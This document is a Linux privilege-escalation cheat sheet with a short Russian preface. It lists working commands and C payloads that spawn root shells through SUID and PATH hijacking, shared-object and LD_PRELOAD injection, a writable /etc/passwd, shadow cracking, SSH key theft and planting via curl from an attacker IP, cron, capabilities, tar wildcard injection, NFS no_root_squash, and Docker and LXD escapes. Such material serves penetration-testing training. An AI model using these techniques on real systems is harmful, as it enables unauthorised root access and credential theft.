PrivEsc: Linux
:::tip Формат страницы
Порядок действий описан по‑русски. В методике сохранены заголовки (типовые термины частично локализованы), таблицы, иллюстрации и блоки кода; команды и параметры приведены на английском, синтаксис не переводится.
:::
Порядок действий
- Зафиксируйте текущие привилегии и политику целевой системы.
- Выберите вектор из раздела с учётом риска для стабильности ОС.
- После проверки откатите изменения, если это предусмотрено соглашением.
- Команды приведены справочно, на английском.
Методика
SUIDs Files
find / -perm -u=s -type f -exec ls -la {} + 2>/dev/null
find / -perm /4000 2>/dev/null
Absolute path
user@pwnbox:~$ strings /usr/local/bin/LaunchApache
[...]
/usr/sbin/service apache2 start
user@pwnbox:~$ function /usr/sbin/service() { /bin/bash -p; }
user@pwnbox:~$ export -f /usr/sbin/service
user@pwnbox:~$ /usr/local/bin/LaunchApache
root@debian:~# id
Relative path
user@pwnbox:~$ ls -la script
-rwsr-xr-x 1 root root 1003 Jun 4 2021 script
user@pwnbox:~$ ltrace ./script
setuid(0)= -1
setgid(0)= -1
system("ls")
user@pwnbox:~$ echo -e '#!/bin/bash\nbash -p' > /tmp/ls
user@pwnbox:~$ chmod +x /tmp/ls
user@pwnbox:~$ PATH=/tmp:$PATH
user@pwnbox:~$ echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
user@machine:~$ ./script
root@machine:~#
Shared Object Injection
user@pwnbox:~$ find / -type f -perm -04000 -ls 2>/dev/null
816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid
user@pwnbox:~$ strace /usr/local/bin/suid 2>&1 | grep -i -E "open|access|no such file"
[...]
access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
user@pwnbox:~$ cat libcalc.c
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
setuid(0);
system("/bin/bash -p");
}
user@pwnbox:~$ mkdir /home/user/.config
user@pwnbox:~$ gcc -shared -o /home/user/.config/libcalc.so -fPIC ./libcalc.c
TCM@debian:~$ /usr/local/bin/suid
Calculating something, please wait...
bash-4.1# id
uid=0(root) gid=1000(user) egid=50(staff) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
SUDO
user@pwnbox:~$ cat /etc/sudoers
user@pwnbox:~$ sudo -s # Execute a shell as root
user@pwnbox:~$ sudo -l
User user may run the following commands on this host:
(root) NOPASSWD: /usr/bin/vim
LD_PRELOAD
user@pwnbox:~$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD
User user may run the following commands on this host:
(root) NOPASSWD: /usr/bin/vim
user@pwnbox:~$ cat pre.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
user@pwnbox:~$ gcc -fPIC -shared -o pre.so pre.c -nostartfiles
user@pwnbox:~$ sudo LD_PRELOAD=pre.so vim
/etc/passwd
-rw-rw-r-- 1 root user 2694 Mar 6 2020 /etc/passwd
openssl passwd -1 -salt [salt] [password]
[...]
root:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
/etc/shadow
Read permissions
unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
john unshadowed.txt -w=<WORDLIST>
SSH Keys
authorized_keys
find / -name authorized_keys 2> /dev/null
curl http://<IP>/.ssh/id_rsa.pub >> ~/.ssh/authotized_keys
id_rsa
find / -name id_rsa 2> /dev/null
grep -iRl "private key" / 2>/dev/null
chmod 400 id_rsa
ssh -i id_rsa user@<IP>
Crontabs
user@pwnbox:~$ cat /etc/crontab
# m h dom mon dow user command
*/5 * * * * root /home/user/script.sh
Capabilities
# List user capabilities
user@pwnbox:~$ capsh --print
# Find files with capabilities
user@pwnbox:~$ getcap -r / 2>/dev/null
/usr/bin/python2.6 = cap_setuid+ep
/usr/bin/perl5.26.1 = cap_setuid+ep
user@pwnbox:~$ /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
user@pwnbox:~$ /usr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Wildcards
user@pwnbox:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
user@pwnbox:~$ echo "cp /bin/bash /tmp && chmod +s /tmp/bash" > shell.sh
user@pwnbox:~$ echo "" > --checkpoint=1
user@pwnbox:~$ echo "" > "--checkpoint-action=exec=sh shell.sh"
NFS (no_root_squash)
cappucino@polonfs:~$ cat /etc/exports
[...]
/home *(rw,no_root_squash)
kali@kali:~$ sudo mount -t nfs 10.10.181.37:home /tmp/mount -nolock
cappucino@polonfs:~$ cp /bin/bash .
kali@kali:/tmp/mount/cappucino$ sudo chown root bash
kali@kali:/tmp/mount/cappucino$ sudo chmod +s bash
cappucino@polonfs:~$ ls -la
-rwsr-sr-x 1 root cappucino 1113504 Jul 15 13:07 bash
cappucino@polonfs:~$ ./bash -p
bash-4.4# id
uid=1000(cappucino) gid=1000(cappucino) euid=0(root)
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > x.c
gcc -static x.c -o x
sudo chown root x
sudo chmod u+s x
-bash-4.2$ ./x
bash-4.2# id
uid=0(root) gid=0(root) groups=0(root)
Containers
Docker
docker images
docker run -v /:/mnt --rm -it <image> chroot /mnt sh
Lxd
# Attacker
cd /tmp/
git clone https://github.com/saghul/lxd-alpine-builder.git; cd lxd-alpine-builder/
sudo ./build-alpine
python -m SimpleHTTPServer 80
# Victim
wget <IP>/alpine.tar.gz
lxc image import ./alpine.tar.gz --alias myalpine
lxc image list #List images
lxc init myalpine ignite -c security.privileged=true
lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
Kernel Exploits
uname -a